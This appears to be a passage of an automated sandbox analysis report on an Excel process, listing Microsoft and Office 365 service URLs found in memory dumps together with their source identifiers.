      Source: EXCEL.EXE, 00000000.00000003.502288674.000000000DEC5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.583692161.000000000DEC6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.501376996.000000000DEC4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.308636150.000000000DEC7000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://outlook.office.com/
      Source: EXCEL.EXE, 00000000.00000002.584874541.0000000012D80000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://outlook.office365.com
      Source: EXCEL.EXE, 00000000.00000003.502288674.000000000DEC5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.583692161.000000000DEC6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.501376996.000000000DEC4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.308636150.000000000DEC7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://outlook.office365.com/
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities=DU
      Source: EXCEL.EXE, 00000000.00000003.296469303.0000000012F74000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: EXCEL.EXE, 00000000.00000003.296469303.0000000012F74000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonlgb
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: EXCEL.EXE, 00000000.00000003.296469303.0000000012F74000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/query=R
      Source: EXCEL.EXE, 00000000.00000003.296469303.0000000012F74000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/queryTemplateStarthttps://
      Source: EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: EXCEL.EXE, 00000000.00000002.584874541.0000000012D80000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControlXI
      Source: EXCEL.EXE, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: EXCEL.EXE, 00000000.00000003.452144265.000000000DE2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.421742854.000000000DE2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.583546383.000000000DE2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388770020.000000000DE2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.501193285.000000000DE2A000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13db8m
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetectHF
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsmQ
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://roaming.edog.
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://settings.outlook.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.comSH9
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://shell.suite.office.com:1443q
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workJ
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workoZy
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://staging.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.ai22
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.ai2X
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://store.office.de/addinstemplate
